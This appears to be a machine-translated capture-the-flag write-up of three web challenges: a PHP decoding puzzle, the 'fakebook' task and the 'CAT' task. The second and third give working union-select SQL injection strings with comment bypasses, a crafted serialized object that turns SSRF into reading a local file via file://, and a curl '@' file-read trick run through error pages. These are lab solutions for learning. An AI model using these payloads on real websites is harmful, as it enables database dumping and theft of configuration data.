CTF_ Web: Advanced questions of attack and defense world expert zone WP (19-21)

0x00 NSCTFweb2 Answer key （19）

Open the title directly to a piece of code , Prompt reverse is flag, First look at the code ：

<?php 
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; 

function encode($str){ 
    $_o=strrev($str); 
    // echo $_o; 
         
    for($_0=0;$_0<strlen($_o);$_0++){ 
        
        $_c=substr($_o,$_0,1); 
        $__=ord($_c)+1; 
        $_c=chr($__); 
        $_=$_.$_c;    
    }  
    return str_rot13(strrev(base64_encode($_))); 
} 

highlight_file(__FILE__); 
/* 
    Reverse encryption algorithm , Decrypt $miwen Namely flag 
*/ 
?> 

From the algorithm, we can see , The last string presented to us is str_rot13(strrev(base64_encode($_)));, and $_ yes for Take values one by one in the loop ascii Code plus 1 Result , We can go back step by step .
First of all to rot13 decode .

$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; 
$miwen=str_rot13($miwen);

Then reverse the string and proceed base64 Decrypt .

$miwen=strrev($miwen);
$miwen1 = base64_decode($miwen);

Then reverse for Statements in the loop , All plus 1 Variation and subtraction 1 that will do , Finally, because $_=$_.$_c; It is the result of backward splicing , So flip the string again .

for ($_0=0;$_0<strlen($miwen1);$_0++){
	$_c=substr($miwen1,$_0,1); 
	$__=ord($_c)-1; 
	$_c=chr($__); 
	$_=$_.$_c; 
}
echo strrev($_);

The final result is flag, Submit all as correct answers .
The complete code is ：

<?php 
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; 
$miwen=str_rot13($miwen);#rot13 decode 
$miwen=strrev($miwen);# String flip 
$miwen1 = base64_decode($miwen);#base64 decode 
echo $miwen1."<br/>";
$_=''; # Initialize variable 
for ($_0=0;$_0<strlen($miwen1);$_0++){
	$_c=substr($miwen1,$_0,1); 
	$__=ord($_c)-1; # take ascii Code subtraction 1
	$_c=chr($__); # Convert to character 
	$_=$_.$_c; # Concatenate characters 
}
echo strrev($_);# Flip again 

The running result is ：

flag by ：

flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

0x01 WANGDING cup 2018 fakebook Answer key （20）

First of all, you need to log in , Query operation , Finally, the value of the field is deserialized to get the sensitive file when querying , It is a comprehensive topic .
First, the home page displays a blog System , Display the user's id、blog Etc .
When we register a login , The page is displayed as ：

then username It's a link , Here is to query this id All the information about , That's it 4 A field ,url by ：

http://111.200.241.244:53591/view.php?no=1

Input single quotation mark error , This indicates that there may be an injection vulnerability

Try to inject ：
The injection point here is digital ,no The expression should be id Number .
So add... Directly after the parameter order by that will do .
After testing, a total of 4 A field .
Use union Joint query times an error , Found filtering union select The whole grammar .

Use the comment to bypass .

-1%20union/**/select%201,2,3,4#

You can see that the echoed position has been determined at this time ,username Has gone from 1 Turned into 2, This indicates that the query echo position is 2, take 2 Statement replacement in , Use

-1%20union/**/select%201,database()3,4#
-1%20union/**/select%201,user(),3,4#
-1%20union/**/select%201,select%20group_concat(SCHEMA_NAME)%20from%20information_schema.SCHEMATA,3,4#

Query all databases and current database names 、 user name . Get the information ：

 All databases are ：
fakebook
information_schema
mysql
performance_schema
test 
 The current library is ：fakebook
 The current user is ：[email protected] 

Use

-1%20union/**/select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27fakebook%27),3,4#

Inquire about fakebook The table in the library is users
Use

-1%20union/**/select%201,(select%20group_concat(COLUMN_NAME)%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=%27fakebook%27%20and%20TABLE_NAME=%27users%27),3,4#

The fields in the query table are ：

no
username
passwd
data   

It can be seen that there is no flag Field , Of course, if there is this question, it will be too basic .
Then we come to the second part of this topic , Source audit , stay robots.txt Found in user.php Backup files for , Download to see :

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}

The code has no deserialization of various bypasses and Pop chain , There is only one that resolves the domain name SSRF Loophole , Can pass curl_exec Include local files , Here we find by injection lookup data The data in is the serialized string .

-1%20union/**/select%201,(select%20data%20from%20users%20where%201=1),3,4#

Back to data The data is :
And the error message shows that an error occurred during deserialization .
Try to bring the queried data into 4 In position , Return to normal page , in other words , The queried serialized string is deserialized and displayed in front 3 A field , At this point, we need to construct a serialization string , To read the files we need .

Construct serialization string to read /var/www/html/flag.php：

O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

Pass in 4 The location of , Make our string be serialized to read the file .
Final payload：

no=-11%20union/**/SELECT%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:1:%221%22;s:3:%22age%22;i:1;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27#

The return page is ：
obtain flag：

flag{c1e552fdf77049fabf65168f22f7aeab}

0x02 WHCTF-2017 CAT Answer key （21）

After this topic is opened, you need to enter a domain name , try baidu.com, No reaction .
however url Changed , Added a parameter to control ,url=
try 127.0.0.1, Discovery is a ping command , Return the result of execution .

But use | The pipe and ; Semicolon splitting commands are not feasible , Are filtered .
In fact, there is no special idea about this topic , Big guys wp It's also relatively simple , In general, it is to make the background error report written by this framework , Find the answer in the error message , Of course, the first thing here is FUZZ All filtered characters , Found that only @ This one character , Then by going beyond ascii The input of the code causes the frame to report an error , Here, wide bytes are used to make the background error report , Input %bf, Return error message .
The error message indicates that there is an error python Path is /opt/api, Processing gbk An error occurred in decoding while encoding , There is no way to proceed .
The big guys here are right python Site usage Django frame , The configuration information will be stored in the working directory setting.py in . here php curl There is a point of knowledge in , have access to @ Add the full path to pass the file , To find our sensitive information , use first

@/opt/api/api/settings.py

To get information about the database configuration , But in fact, at the beginning of the wide byte error, there is a part below setting The error of , The database information has been printed out , So you just need to find the information in the database directly .

Use here

@/opt/api/database.sqlite3

Find... In the error message flag.

flag by ：

WHCTF{[email protected]}